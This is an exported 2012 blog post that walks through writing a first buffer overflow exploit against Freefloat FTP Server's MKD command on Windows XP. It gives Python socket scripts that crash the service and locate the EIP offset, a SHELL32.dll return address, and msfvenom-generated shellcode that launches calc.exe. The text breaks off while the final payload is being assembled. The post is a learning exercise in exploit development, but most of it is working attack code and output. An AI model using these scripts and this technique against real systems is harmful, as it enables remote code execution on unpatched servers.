{"id":807,"date":"2012-08-02T16:51:37","date_gmt":"2012-08-02T15:51:37","guid":{"rendered":"http:\/\/www.phillips321.co.uk\/?p=807"},"modified":"2012-08-30T12:44:11","modified_gmt":"2012-08-30T11:44:11","slug":"writing-my-first-exploit-freefloat-ftp","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/08\/02\/writing-my-first-exploit-freefloat-ftp\/","title":{"rendered":"Writing my first exploit &#8211; Freefloat FTP"},"content":{"rendered":"<p>So I&#8217;ve for a while needed to learn how to exploit a service using things like NOP sleds and so on. I decided to follow <a href=\"http:\/\/www.fuzzysecurity.com\/tutorials\/expDev\/2.html\" target=\"_blank\">this great tutorial here<\/a> but wanted to make my own notes.<\/p>\n<p>First off you&#8217;ll need the following:<\/p>\n<ul>\n<li>Windows XP x86 SP3 machine<\/li>\n<li><a href=\"http:\/\/immunityinc.com\/products-immdbg.shtml\" target=\"_blank\">Immunity Debugger<\/a><\/li>\n<li><a href=\"http:\/\/redmine.corelan.be\/projects\/mona\/repository\" target=\"_blank\">mona.py<\/a> &#8211; place inside PyCommands folder of Immunity<\/li>\n<li><a href=\"http:\/\/www.freefloat.com\/sv\/freefloat-ftp-server\/freefloat-ftp-server.php\" target=\"_blank\">Freefloat FTP Server<\/a> &#8211; the target we will be attacking<\/li>\n<\/ul>\n<p>Background &#8211; The MKD command of the FTP server is vulnerable to a buffer overflow, we will use this function to exploit the service.<\/p>\n<p>Ok the first thing to do is test that Freefloat FTP is working, load it up in Win XP and perform a quick FTP connect to it. Now close FreeFloat FTP by clicking the unload button.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/freefloat.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/freefloat.jpg\" alt=\"\" title=\"freefloat\" width=\"216\" height=\"116\" class=\"aligncenter size-full wp-image-821\" \/><\/a><br \/>\nOkay, now load Immunity Debugger and open the FreeFloat Executable<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.open_.freefloat.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.open_.freefloat-150x150.jpg\" alt=\"\" title=\"i.open.freefloat\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-827\" \/><\/a><br \/>\nFreefloat will now load into Immunity in a paused state. To Run click either the play button, Debug&#8211;>Run or press F9.<\/p>\n<p>Now that FreeFloat FTP is open and accepting connections we will attempt the buffer over flow using some simple python code:<\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/><\/div><\/td><td><div class=\"python codecolorer\">Python 2.7.3 <span class=\"br0\">&#40;<\/span>default<span class=\"sy0\">,<\/span> Apr <span class=\"nu0\">20<\/span> <span class=\"nu0\">2012<\/span><span class=\"sy0\">,<\/span> <span class=\"nu0\">22<\/span>:<span class=\"nu0\">39<\/span>:<span class=\"nu0\">59<\/span><span class=\"br0\">&#41;<\/span> <br \/>\n<span class=\"br0\">&#91;<\/span>GCC 4.6.3<span class=\"br0\">&#93;<\/span> on linux2<br \/>\nType <span class=\"st0\">&quot;help&quot;<\/span><span class=\"sy0\">,<\/span> <span class=\"st0\">&quot;copyright&quot;<\/span><span class=\"sy0\">,<\/span> <span class=\"st0\">&quot;credits&quot;<\/span> <span class=\"kw1\">or<\/span> <span class=\"st0\">&quot;license&quot;<\/span> <span class=\"kw1\">for<\/span> more information.<br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> <span class=\"kw1\">import<\/span> <span class=\"kw3\">sys<\/span><span class=\"sy0\">,<\/span> <span class=\"kw3\">socket<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> evil <span class=\"sy0\">=<\/span> <span class=\"st0\">&quot;A&quot;<\/span>*<span class=\"nu0\">1000<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s<span class=\"sy0\">=<\/span><span class=\"kw3\">socket<\/span>.<span class=\"kw3\">socket<\/span><span class=\"br0\">&#40;<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">AF_INET<\/span><span class=\"sy0\">,<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">SOCK_STREAM<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> connect<span class=\"sy0\">=<\/span>s.<span class=\"me1\">connect<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'192.168.0.71'<\/span><span class=\"sy0\">,<\/span><span class=\"nu0\">21<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"st0\">'220 FreeFloat Ftp Server (Version 1.00).<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'USER anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"nu0\">16<\/span><br \/>\n<span class=\"st0\">'220 FreeFloat Ftp Server (Version 1.00).<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'PASS anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"nu0\">16<\/span><br \/>\n<span class=\"st0\">'331 Password required for anonymous.<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'MKD '<\/span> + evil + <span class=\"st0\">'<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"nu0\">1006<\/span><br \/>\n<span class=\"st0\">'230 User anonymous logged in.<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'QUIT<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">close<\/span><br \/>\n<span class=\"nu0\">6<\/span><br \/>\n<span class=\"sy0\">&lt;<\/span>bound method _socketobject.<span class=\"me1\">close<\/span> of <span class=\"sy0\">&lt;<\/span><span class=\"kw3\">socket<\/span>._socketobject <span class=\"kw2\">object<\/span> at <span class=\"nu0\">0x1619360<\/span><span class=\"sy0\">&gt;&gt;<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>This should cause Immunity Debugger to pause due to an access viloation due to trying to execute code at memory address 41414141(AAAA), this can be seen in the top right <i>EIP 41414141<\/i> It&#8217;s crucial to note that both ESP and EDI have been over written by our string of As as we&#8217;ll be setting the EIP (instruction pointer) to use one of these locations later.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.1.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.1-150x150.jpg\" alt=\"\" title=\"i.1\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-822\" \/><\/a><br \/>\nNow what we need to try and doing is figure out which of these&#8217;s 4 A&#8217;s wrote to the EIP location, we could try something like:<br \/>\naaaaAAAAAAAAAAAAAAAAAAAAAAAAAAA&#8230;. and then<br \/>\nAAAAaaaaAAAAAAAAAAAAAAAAAAAAAAA&#8230;&#8230; and so on but this would take ages. (upto 250 attempts)<\/p>\n<p>Step in mona and metasploit.<\/p>\n<p>The first thing we need to do is generate a string of length 1000 using metasploits pattern create tool to create a pattern that mona can use to find the exact locations within memory:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">\/msf3\/tools$ .\/pattern_create.rb 1000<br \/>\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>We now need to use this string as the value passed for the directory to be created. Restart FreeFloat FTP service inside Immunity Debugger using Ctrl+F2 followed by F9 OR Debug&#8211;>Restart followed by Debug&#8211;>Run<\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/><\/div><\/td><td><div class=\"python codecolorer\"><span class=\"co1\">#!\/usr\/bin\/python<\/span><br \/>\n<span class=\"kw1\">import<\/span> <span class=\"kw3\">socket<\/span><br \/>\n<span class=\"kw1\">import<\/span> <span class=\"kw3\">sys<\/span><br \/>\nevil<span class=\"sy0\">=<\/span><span class=\"st0\">&quot;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B&quot;<\/span><br \/>\ns<span class=\"sy0\">=<\/span><span class=\"kw3\">socket<\/span>.<span class=\"kw3\">socket<\/span><span class=\"br0\">&#40;<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">AF_INET<\/span><span class=\"sy0\">,<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">SOCK_STREAM<\/span><span class=\"br0\">&#41;<\/span><br \/>\nconnect<span class=\"sy0\">=<\/span>s.<span class=\"me1\">connect<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'192.168.0.71'<\/span><span class=\"sy0\">,<\/span><span class=\"nu0\">21<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'USER anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'PASS anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'MKD '<\/span> + evil + <span class=\"st0\">'<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'QUIT<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">close<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Running this code against FreeFloatFTP will once again cause the service to lock up, we now use the following command <i>!mona findmsp<\/i><br \/>\nThe findmsp command will (taken from https:\/\/community.rapid7.com\/community\/metasploit\/blog\/2011\/10\/11\/monasploit)<br \/>\nlook for the first 8 bytes of the cyclic pattern anywhere in process memory (normal or unicode expanded)<br \/>\nlook at all registers and list the registers that either point at or are overwritten with a part of the pattern.  It will show the offset and the length of the pattern in memory after that offset in case the registers points into the pattern<br \/>\nlook for pointers into a part of the pattern on the stack (+ shows offset and length)<br \/>\nlook for artifacts of the pattern on the stack (+ shows offset and length)<br \/>\nquery the SEH chain and determine if it was overwritten with a cyclic pattern or not.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.2.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.2-150x150.jpg\" alt=\"\" title=\"i.2\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-823\" \/><\/a><br \/>\nWhat need need to take from this is the following:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">EIP overwritten with normal pattern : 0x69413269 (offset 247)<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>The offset of 247 means if we use the following our B&#8217;s will be written into the EIP <i>(note: we&#8217;re still keeping the string length of 1000)<\/i>.<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">evil = &quot;A&quot;*247 + &quot;B&quot;*4 + &quot;C&quot;*749<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Restart FloatFTP and go back to the CPU window <b>c<\/b> or Alt+C<\/p>\n<p>When we inject this it should only write BBBB (42424242) into the EIP:<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.3.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.3-150x150.jpg\" alt=\"\" title=\"i.3\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-824\" \/><\/a><br \/>\n(here I have issued the command <i>d esp<\/i> and then scrolled up a bit to see what i&#8217;ve injected)<\/p>\n<p>So what this means is instead of BBBB we can replace them with a pointer to a location in memory, specifically memory that we have written to, in this case we will use ESP.<br \/>\nTo find this pointer we use the immunity command <i>!mona jmp -r esp<\/i><br \/>\nThis might take a second or two but once it&#8217;s complete open the log window by click the l (Alt+L)at the top of the screen<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.4.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.4-150x150.jpg\" alt=\"\" title=\"i.4\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-825\" \/><\/a><\/p>\n<p>We should now see that many DLLs listed, any of these will do, all here are windows DLLs but it doesnt matter as this is only a tutorial <i>(the DLLs might be in different locations on other operating systems or service packs)<\/i><\/p>\n<p>In this example we will use the SHELL32.dll to return to our injected code (note the push exp # ret)<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">0x7c9c167d : push esp # &nbsp;ret &nbsp;| &nbsp;{PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\\WINDOWS\\system32\\SHELL32.dll)<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>We can try our exploit again with the following values for BBBB:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">evil = &quot;A&quot;*247 + &quot;\\x7D\\x16\\x9C\\x7C&quot; + &quot;C&quot;*749<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><i>Note: we are referencing the mem location in reverse byte order due to the Little Endian architecture of the CPU. We are also still keeping our string length to 1000 to prevent tripping a different possible exploit<\/i><br \/>\nRestart FloatFTP and now inject the new string with the modified pointer.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.5.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.5-150x150.jpg\" alt=\"\" title=\"i.5\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-826\" \/><\/a><\/p>\n<p>Now all we need to do is generate some shellcode and add that the the string. Do do this we will first generate some shellcode using msfvenom, when doing this we need to ensure that bad characters are not used. This tutorial will not cover identifing the bad characters but for now just accept them to be <i>\\x00 \\x0A \\x0D<\/i>:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/><\/div><\/td><td><div class=\"text codecolorer\">\/msf3$ .\/msfvenom -p windows\/exec CMD=calc.exe -b '\\x00\\x0A\\x0D' -f c<br \/>\n[*] x86\/shikata_ga_nai succeeded with size 227 (iteration=1)<br \/>\nunsigned char buf[] = <br \/>\n&quot;\\xbf\\xcd\\x19\\x02\\x91\\xd9\\xea\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1&quot;<br \/>\n&quot;\\x33\\x31\\x7e\\x12\\x03\\x7e\\x12\\x83\\x0b\\x1d\\xe0\\x64\\x6f\\xf6\\x6d&quot;<br \/>\n&quot;\\x86\\x8f\\x07\\x0e\\x0e\\x6a\\x36\\x1c\\x74\\xff\\x6b\\x90\\xfe\\xad\\x87&quot;<br \/>\n&quot;\\x5b\\x52\\x45\\x13\\x29\\x7b\\x6a\\x94\\x84\\x5d\\x45\\x25\\x29\\x62\\x09&quot;<br \/>\n&quot;\\xe5\\x2b\\x1e\\x53\\x3a\\x8c\\x1f\\x9c\\x4f\\xcd\\x58\\xc0\\xa0\\x9f\\x31&quot;<br \/>\n&quot;\\x8f\\x13\\x30\\x35\\xcd\\xaf\\x31\\x99\\x5a\\x8f\\x49\\x9c\\x9c\\x64\\xe0&quot;<br \/>\n&quot;\\x9f\\xcc\\xd5\\x7f\\xd7\\xf4\\x5e\\x27\\xc8\\x05\\xb2\\x3b\\x34\\x4c\\xbf&quot;<br \/>\n&quot;\\x88\\xce\\x4f\\x69\\xc1\\x2f\\x7e\\x55\\x8e\\x11\\x4f\\x58\\xce\\x56\\x77&quot;<br \/>\n&quot;\\x83\\xa5\\xac\\x84\\x3e\\xbe\\x76\\xf7\\xe4\\x4b\\x6b\\x5f\\x6e\\xeb\\x4f&quot;<br \/>\n&quot;\\x5e\\xa3\\x6a\\x1b\\x6c\\x08\\xf8\\x43\\x70\\x8f\\x2d\\xf8\\x8c\\x04\\xd0&quot;<br \/>\n&quot;\\x2f\\x05\\x5e\\xf7\\xeb\\x4e\\x04\\x96\\xaa\\x2a\\xeb\\xa7\\xad\\x92\\x54&quot;<br \/>\n&quot;\\x02\\xa5\\x30\\x80\\x34\\xe4\\x5e\\x57\\xb4\\x92\\x27\\x57\\xc6\\x9c\\x07&quot;<br \/>\n&quot;\\x30\\xf7\\x17\\xc8\\x47\\x08\\xf2\\xad\\xb8\\x42\\x5f\\x87\\x50\\x0b\\x35&quot;<br \/>\n&quot;\\x9a\\x3c\\xac\\xe3\\xd8\\x38\\x2f\\x06\\xa0\\xbe\\x2f\\x63\\xa5\\xfb\\xf7&quot;<br \/>\n&quot;\\x9f\\xd7\\x94\\x9d\\x9f\\x44\\x94\\xb7\\xc3\\x0b\\x06\\x5b\\x2a\\xae\\xae&quot;<br \/>\n&quot;\\xfe\\x32&quot;;<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now we need to insert this code into the string but at the same time we&#8217;ll ensure it still remians at 1000 characters long:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/><\/div><\/td><td><div class=\"text codecolorer\">shellcode = (&quot;\\xbf\\xcd\\x19\\x02\\x91\\xd9\\xea\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1&quot;<br \/>\n&quot;\\x33\\x31\\x7e\\x12\\x03\\x7e\\x12\\x83\\x0b\\x1d\\xe0\\x64\\x6f\\xf6\\x6d&quot;<br \/>\n&quot;\\x86\\x8f\\x07\\x0e\\x0e\\x6a\\x36\\x1c\\x74\\xff\\x6b\\x90\\xfe\\xad\\x87&quot;<br \/>\n&quot;\\x5b\\x52\\x45\\x13\\x29\\x7b\\x6a\\x94\\x84\\x5d\\x45\\x25\\x29\\x62\\x09&quot;<br \/>\n&quot;\\xe5\\x2b\\x1e\\x53\\x3a\\x8c\\x1f\\x9c\\x4f\\xcd\\x58\\xc0\\xa0\\x9f\\x31&quot;<br \/>\n&quot;\\x8f\\x13\\x30\\x35\\xcd\\xaf\\x31\\x99\\x5a\\x8f\\x49\\x9c\\x9c\\x64\\xe0&quot;<br \/>\n&quot;\\x9f\\xcc\\xd5\\x7f\\xd7\\xf4\\x5e\\x27\\xc8\\x05\\xb2\\x3b\\x34\\x4c\\xbf&quot;<br \/>\n&quot;\\x88\\xce\\x4f\\x69\\xc1\\x2f\\x7e\\x55\\x8e\\x11\\x4f\\x58\\xce\\x56\\x77&quot;<br \/>\n&quot;\\x83\\xa5\\xac\\x84\\x3e\\xbe\\x76\\xf7\\xe4\\x4b\\x6b\\x5f\\x6e\\xeb\\x4f&quot;<br \/>\n&quot;\\x5e\\xa3\\x6a\\x1b\\x6c\\x08\\xf8\\x43\\x70\\x8f\\x2d\\xf8\\x8c\\x04\\xd0&quot;<br \/>\n&quot;\\x2f\\x05\\x5e\\xf7\\xeb\\x4e\\x04\\x96\\xaa\\x2a\\xeb\\xa7\\xad\\x92\\x54&quot;<br \/>\n&quot;\\x02\\xa5\\x30\\x80\\x34\\xe4\\x5e\\x57\\xb4\\x92\\x27\\x57\\xc6\\x9c\\x07&quot;<br \/>\n&quot;\\x30\\xf7\\x17\\xc8\\x47\\x08\\xf2\\xad\\xb8\\x42\\x5f\\x87\\x50\\x0b\\x35&quot;<br \/>\n&quot;\\x9a\\x3c\\xac\\xe3\\xd8\\x38\\x2f\\x06\\xa0\\xbe\\x2f\\x63\\xa5\\xfb\\xf7&quot;<br \/>\n&quot;\\x9f\\xd7\\x94\\x9d\\x9f\\x44\\x94\\xb7\\xc3\\x0b\\x06\\x5b\\x2a\\xae\\xae&quot;<br \/>\n&quot;\\xfe\\x32&quot;)<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td 